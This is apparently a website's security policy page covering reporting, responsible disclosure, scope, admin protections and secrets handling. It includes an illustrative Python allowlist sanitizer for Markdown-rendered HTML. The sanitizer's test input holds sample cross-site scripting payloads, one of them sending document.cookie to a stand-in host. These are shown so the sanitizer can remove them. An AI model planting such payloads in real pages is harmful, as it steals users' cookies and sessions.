Baseline
Security is part of the default operating baseline. The site uses secure headers, environment-based configuration, request size limits, server-rendered pages, minimal JavaScript, and careful handling of rendered Markdown. The same operating mindset is intended to carry into each product in the portfolio.
Reporting
Security reports can be sent to [email protected]. Please include the affected URL or product, a clear description of the issue, reproduction steps, potential impact, and any relevant screenshots or request details. Avoid including secrets, personal data, or destructive proof-of-concept payloads.
Responsible disclosure
Good-faith security research is welcome when it avoids harm, accessing or retaining data that is not your own, service disruption, establishing persistence, social engineering, and public disclosure before the issue has been reviewed. Reports should focus on practical impact and reproducibility.
Out of scope for the core site
Automated scanner output without demonstrated impact, missing headers on third-party services, denial-of-service testing, spam submissions, and issues that require physical access or an already compromised user device are generally out of scope for this core website.
Admin and content security
Admin publishing routes are protected by authentication, session cookies, and CSRF checks. Blog content is rendered from Markdown with raw HTML disabled by default. Disabling raw HTML does not by itself restrict link targets, so unsafe schemes such as javascript: in Markdown links must also be rejected. If future product features accept untrusted rich content, the rendered HTML should be sanitized against an allowlist of tags and attributes before display.
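The kind of allowlist sanitizer the paragraph above calls for, as an added example that is not the site's own code. It takes HTML already produced by a Markdown renderer, keeps only a fixed set of tags and attributes, drops script and style content entirely, and rejects href/src values whose scheme is not http, https or mailto (after stripping the control characters browsers ignore, so a newline inside "javascript:" does not slip through). The tag and attribute lists, the sample input, and the function names are illustrative assumptions, not the site's actual configuration.

```python
"""Allowlist HTML sanitizer for rendered Markdown (added example, stdlib only).

Assumptions: input is HTML produced by a Markdown renderer; the allowlists
below are illustrative choices, not the site's real policy.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

ALLOWED_TAGS = {
    "p", "br", "strong", "em", "code", "pre", "blockquote",
    "ul", "ol", "li", "h1", "h2", "h3", "a", "img",
}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt", "title"}}
URL_ATTRS = {"href", "src"}
ALLOWED_SCHEMES = {"http", "https", "mailto"}
VOID_TAGS = {"br", "img"}
# Everything inside these tags is discarded, not just the tags themselves.
DROP_CONTENT_TAGS = {"script", "style"}


def safe_url(value):
    """Allow relative URLs and http(s)/mailto; reject javascript:, data:, etc."""
    # Browsers strip ASCII control characters (tab, LF, CR) from URLs before
    # resolving them, so remove them here too or "java\nscript:" parses as relative.
    cleaned = "".join(ch for ch in value if ord(ch) >= 0x20).strip()
    scheme = urlparse(cleaned).scheme  # urlparse lowercases the scheme
    return scheme == "" or scheme in ALLOWED_SCHEMES


class Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.drop_depth = 0  # > 0 while inside script/style

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT_TAGS:
            self.drop_depth += 1
            return
        if self.drop_depth or tag not in ALLOWED_TAGS:
            return  # unknown tag: drop the tag, keep its text content
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # drops on*, style, class, etc.
            value = value or ""
            if name in URL_ATTRS and not safe_url(value):
                continue  # drop the unsafe URL attribute, keep the element
            kept.append(f' {name}="{escape(value, quote=True)}"')
        if tag == "a":
            kept.append(' rel="noopener noreferrer"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT_TAGS:
            if self.drop_depth:
                self.drop_depth -= 1
            return
        if self.drop_depth or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.drop_depth:
            # convert_charrefs=True hands us decoded text; re-escape it.
            self.out.append(escape(data, quote=False))

    def result(self):
        return "".join(self.out)


def sanitize(html):
    s = Sanitizer()
    s.feed(html)
    s.close()  # flushes buffered text
    return s.result()


# Constructed sample of renderer output containing typical injection attempts.
UNTRUSTED = (
    '<p onclick="steal()">Hello <strong>world</strong></p>'
    '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'
    '<a href="javascript:alert(1)">click</a>'
    '<a href="https://example.com/post">ok</a>'
    '<img src="x" onerror="alert(1)">'
)

if __name__ == "__main__":
    print(sanitize(UNTRUSTED))
```

Unknown tags are dropped while their text is kept, so an injected iframe or form disappears without losing surrounding content; unsafe href/src values are removed but the element stays, which avoids silently swallowing link text.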
Secrets and configuration
Production secrets such as admin password hashes, social publishing tokens, API credentials, and email provider keys must be supplied through environment variables or a secret store. They should not be committed to source control or embedded in templates.
Operational response
Security reports are reviewed based on severity, exploitability, affected systems, and user impact. Confirmed issues should be fixed, documented internally, and followed by appropriate deployment and verification steps.